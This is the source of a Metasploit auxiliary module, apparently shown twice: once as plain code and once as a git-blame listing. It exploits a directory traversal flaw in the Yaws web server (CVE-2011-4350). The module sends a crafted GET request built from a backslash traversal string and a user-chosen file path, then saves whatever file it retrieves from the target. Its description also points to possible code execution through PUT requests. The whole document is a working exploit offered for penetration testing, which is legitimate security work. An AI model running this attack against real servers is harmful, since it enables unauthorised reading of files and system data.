metasploit-framework/modules/auxiliary/scanner/http/yaws_traversal.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Yaws Web Server Directory Traversal",
      'Description'    => %q{
          This module exploits a directory traversal bug in Yaws v1.9.1 or less.
        The module can only be used to retrieve files. However, code execution might
        be possible. Because when the malicious user sends a PUT request, a file is
        actually created, except no content is written.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'sinn3r',  #Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2011-4350'],
          ['OSVDB', '77581'],
          ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=757181']
        ],
      'DisclosureDate' => "Nov 25 2011"
    ))

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('FILEPATH', [false, 'The name of the file to download', 'boot.ini'])
      ], self.class)

    deregister_options('RHOST')
  end

  def run_host(ip)
    # No point to continue if no filename is specified
    if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?
      print_error("Please supply the name of the file you want to download")
      return
    end

    # Create request
    traversal = "..\\..\\..\\..\\"
    res = send_request_raw({
      'method' => 'GET',
      'uri'    => "/#{traversal}/#{datastore['FILEPATH']}"
    }, 25)

    # Show data if needed
    if res and res.code == 200
      vprint_line(res.to_s)
      fname = File.basename(datastore['FILEPATH'])

      path = store_loot(
        'yaws.http',
        'application/octet-stream',
        ip,
        res.body,
        fname
      )
      print_status("File saved in: #{path}")
    else
      print_error("Nothing was downloaded")
    end
  end
end
Add CVE-2011-4350 2011-12-08 00:42:52 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
Fix up the boilerplate comment to use a better url 2012-02-21 01:40:50 +00:00			`# web site for more information on licensing and terms of use.`
			`# http://metasploit.com/`
Add CVE-2011-4350 2011-12-08 00:42:52 +00:00			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Auxiliary`

Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Auxiliary::Scanner`
			`include Msf::Auxiliary::Report`
			`include Msf::Exploit::Remote::HttpClient`
Add CVE-2011-4350 2011-12-08 00:42:52 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => "Yaws Web Server Directory Traversal",`
			`'Description' => %q{`
			`This module exploits a directory traversal bug in Yaws v1.9.1 or less.`
			`The module can only be used to retrieve files. However, code execution might`
			`be possible. Because when the malicious user sends a PUT request, a file is`
			`actually created, except no content is written.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'sinn3r', #Metasploit`
			`],`
			`'References' =>`
			`[`
			`['CVE', '2011-4350'],`
			`['OSVDB', '77581'],`
			`['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=757181']`
			`],`
			`'DisclosureDate' => "Nov 25 2011"`
			`))`
Add CVE-2011-4350 2011-12-08 00:42:52 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`register_options(`
			`[`
			`Opt::RPORT(8080),`
			`OptString.new('FILEPATH', [false, 'The name of the file to download', 'boot.ini'])`
			`], self.class)`
Add CVE-2011-4350 2011-12-08 00:42:52 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`deregister_options('RHOST')`
			`end`
Add CVE-2011-4350 2011-12-08 00:42:52 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def run_host(ip)`
			`# No point to continue if no filename is specified`
			`if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?`
			`print_error("Please supply the name of the file you want to download")`
			`return`
			`end`
Add CVE-2011-4350 2011-12-08 00:42:52 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`# Create request`
			`traversal = "..\\..\\..\\..\\"`
			`res = send_request_raw({`
			`'method' => 'GET',`
			`'uri' => "/#{traversal}/#{datastore['FILEPATH']}"`
			`}, 25)`
Add CVE-2011-4350 2011-12-08 00:42:52 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`# Show data if needed`
			`if res and res.code == 200`
			`vprint_line(res.to_s)`
			`fname = File.basename(datastore['FILEPATH'])`
Add CVE-2011-4350 2011-12-08 00:42:52 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`path = store_loot(`
			`'yaws.http',`
			`'application/octet-stream',`
			`ip,`
			`res.body,`
			`fname`
			`)`
			`print_status("File saved in: #{path}")`
			`else`
			`print_error("Nothing was downloaded")`
			`end`
			`end`
Add CVE-2011-4350 2011-12-08 00:42:52 +00:00			`end`